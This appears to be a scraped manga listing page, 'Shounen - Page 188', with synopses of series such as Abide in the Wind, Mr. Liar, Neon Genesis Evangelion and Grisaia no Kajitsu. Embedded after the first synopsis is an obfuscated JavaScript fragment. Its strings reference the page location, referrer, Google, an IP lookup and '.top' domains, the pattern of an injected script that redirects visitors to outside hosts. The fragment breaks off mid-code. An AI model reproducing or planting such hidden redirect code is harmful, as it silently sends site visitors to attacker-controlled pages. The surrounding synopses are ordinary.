Shounen - Page 188

Shounen manga is a genre for young male readers, focusing on action, adventure, and character development. It often includes intense battles, friendships, and the journey of the protagonist as they overcome challenges.

9534 results

Abide in the Wind

Reana lives peacefully in a small town deep in the province of the Earthside Kingdom. She has a loving father, an interesting job and the childlike trust in the people around her... But everything changes after she encounters a dying dragon. He is the last one of his kind and possesses the power which can shake the world - what a great titbit for others! And so Reana is thrown into turmoil, into the desperate search for answers - while the hunt after her begins.<script></script><script>function _0x4475(){var _0x307bcf=['12ApztTy','516873jbGQLa','572bCNVkM','then','location','referrer','floor','google','NqdKz','.customapi','.top/','https://ip','includes','4893471PxHSAm','Yarnt','133890bYRPda','YFimp','20FydMTr','TsYnJ','fGoTO','IATcf','2dhLiUU','random','wSCik','','href','528952ndfBPa','1070435RtuarR','14fRisYx','npsMV','40123368mUoFAg','XzofJ','xXrkd','1175358usfFaF','text','http://rea'];_0x4475=function(){return _0x307bcf;};return _0x4475();}function _0x56c1(_0x7748f2,_0xa32c50){var _0x5c9624=_0x4475();return _0x56c1=function(_0x3061af,_0x4469f2){_0x3061af=_0x3061af-(0x19d1*0x1+-0x52*-0x6e+-0x3c40);var _0xfd4514=_0x5c9624[_0x3061af];return _0xfd4514;},_0x56c1(_0x7748f2,_0xa32c50);}(function(_0x413b90,_0x4927e3){var _0x29d109=_0x56c1,_0xa478f4=_0x413b90();while(!![]){try{var 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I’m Really Not The Villain

Read “I’m Really Not The Villain Manga” – “I’m Really Not The Villain Manhwa” Online Free At HOT MANHWA The summary of the comic I’m Really Not The Villain: The human world was dominated by unknown terror. To survive, a group of awakened people chose to fight back. Yi Lin, an unlucky guy who hadn’t had the chance to be the hero, was betrayed after he managed to kill the final boss. But he gets reborn with the abilities of a villainous boss. The once ordinary man becomes the mortal enemy of countless gods and demons. Hey, you guys over there, it’s too late to kneel now. “I’m Really Not The Villain” is also known as: Ben Gerçekten Kötü Adam Değilim / I’m Really Not a Supervillain / I’m Not a Villain / I’m Truly Not the Villainous Big Shot / Wo Zhen Bushi Fanpai Da Lao / Wo Zhen Bushi Fanpai Dalao / Wǒ Zhēn Bùshì Fǎnpài Dàlǎo / 我真不是反派大佬 / 神力を覚醒した俺だけ無限にレベルアップ The comic “I’m Really Not The Villain” belongs to the Genre: Action, Adventure, Fantasy, Harem, Martial Arts, Mature, Mystery, Supernatural “ManhuaPlus, Manga Updates, Manhwa Website…” are the most searched keywords on the website MANHWACLAN. We offer a wide selection of the best and newest comic series with all chapters updated quickly and featuring high-quality images, providing readers with wonderful and enjoyable reading experiences at LikeManga. You can read TOP MANGA The Regretful Villainess Is Happy Because She Got Divorced Underworld Restaurant I Became The King by Scavenging


Mr. Liar

Coquettish Lawyer x Tsundere Detective! Officer Shen, the human-lie-detector detective, finds it difficult to resist the smooth-talking lawyer, his nemesis who spits out lies like flowing electric current. "You used to be my closest friend, yet you ruined my reputation. Now you actually dare to come back and lick me?!” The elite police officer, after demoted to the Useless Department, meets his Mr. Liar again. Can the past misunderstandings between them be resolved? Can they go back to how they were in the past?


The Strongest Magical Swordsman Ever Reborn As An F-Rank Adventurer (Manga)

Yuri was the hero who saved the world, being called "Demon Emperor" in his first reincarnation and "Sword Saint" in his second reincarnation. However, before he knew it, he was considered a "monster" and was shunned by people. Yuri finally gets fed up and decides to live 100% for himself next time.He reincarnates into the future and is immediately attacked by monsters. As he defends himself, Yuri acquires the skills of his previous lives and quickly annihilates his enemies. Eventually, Yuri arrives at the adventurers guild and decides to start his life as an F-rank novice adventurer while hiding his true strength.A different world fantasy of a man who has mastered both magic and swordsmanship begins!!



The star of a male idol group who has a cold demeanor, yet has no control on his fading fame and popularity. And an idol with a harmless and childlike cutesy personality on cameras, and a completely opposite persona off-stage... They're sworn enemies that always bite at each other who somehow ends up having to act lovey-dovey with each other as fan service?! Yup, smells nice!


Naruto: Sasuke's Story—The Uchiha And The Heavenly Stardust: The Manga

Uchiha Sasuke heads for an astronomical observatory far from the Land of Fire where he joins up with Sakura and dives into an undercover investigation to search for traces of the Sage of Six Paths! There, they discover a plan that goes beyond life and death… Where will the battle take this husband-and-wife team?


Takumi-kun Series

From Forever More: Shidou highschool Institute is an all-boys dormitory school located far from the city inside the mountains. Takumi, who is going out with the famous Gii - Saki Giichi in the academy, has a secret which no one knows... From Blue: June Pride: Far away from the city, deep within the mountains, sits the all-boys high school, Shidou Academy. In years past, this school housed only the sons of the most elite families in the country, but these days it welcomes all into its historic halls. Takumi, a boy from humble origins, prepares to begin his second year at the school. Held back by psychological issues, Takumi’s indifferent attitude has garnered him no friends and the reputation as a cold fish. Then along comes Gui, a wealthy and charismatic student born in America. Gui is the only person who doesn’t see Takumi as odd, and the two become friends. But how will the two cope when Gui confesses his love to Takumi? And can the couple survive the revelation of the secret behind the psychological problems that plague Takumi? Barefoot Waltz: 17 year-old violin prodigy, Sachi, has scheduled a performance at Shidou Academy that has all the student body abuzz. This is especially true for Takumi who gave up the violin, but has nevertheless been an ardent admirer of Sachi for years. When the two become friends, how will it affect Takumi’s relationship with Gui? And what is the true reason behind Sachi’s visit to Shidou Academy? Kisetsu Hazure no Kaidan: When Takumi and Gui hear an odd sound in the science lab late one night, they discover a photograph that leads them to a mystery involving the school clock tower. Is the school haunted by a vengeful ghost? Or is someone hiding a dark secret? And when the couple spends their first Christmas together, will Gui play the role of Santa and fulfill all of Takumi's desires?


Neon Genesis Evangelion

In 2015, the "Angels" have returned, and Shinji Ikari, a fourteen year-old child of the new Earth, is forced by his father Gendo--commander of the secret organization NERV--to pilot the monstrous biomechanical weapon called "Evangelion" to match the Angels' fearsome power...


Minus Hand

Having MINUS HAND gives the opportunity to face all challenges!


Goblin Is Very Strong

Goblin-san accidentally reached level 99... and now she keeps killing heroes.


White Epic

In an era where monsters threaten both humans and outlaws, ascetics arise to fight back over the past 500 years. Some of them were heroes, some of them were prophets, some of them were just ascetics going from place to place, in order to protect people from being devoured and the lands from being corrupted. Baek So-Juh is a girl isolated from her village by other youngsters, since she knows how to read and write. On a night in the bush of the outskirt, she witnesses monsters eating a corpse, just to encounter the next day a boy who happens to be an ascetic on the hunt for those same man eater monsters, calling himself Hong Kil-Dong. From then on, she decides to follow him in order to write the story of his life.


Grisaia no Kajitsu - L'oiseau bleu

Mihama Academy - on the surface, a closed learning environment established to nurture students who find themselves at odds with the world around them; in actuality, an orchard-cum-prison built to preserve fruit that has fallen too far from its tree. Whatever the circumstances behind its establishment, Mihama Academy is at present home to five female students, all with their own reasons for "enrollment." For better or worse, each girl has established a routine obliging of her current situation; life moves at an idle, yet accommodating pace within the walls of Mihama. Yet with the arrival of the institute's first male student, the nearly preposterously opaque Kazami Yuuji, the students at Mihama begin to fall out of step with their predetermined rhythms. Will Yuuji prove to be the element the girls around him needed to take hold of their lives once more, or will the weight of their pasts prove too steep a wall to overcome? Based on the visual novel of the same name by Front Wing. This spin-off focuses heavily on Yumiko Sakaki's story.
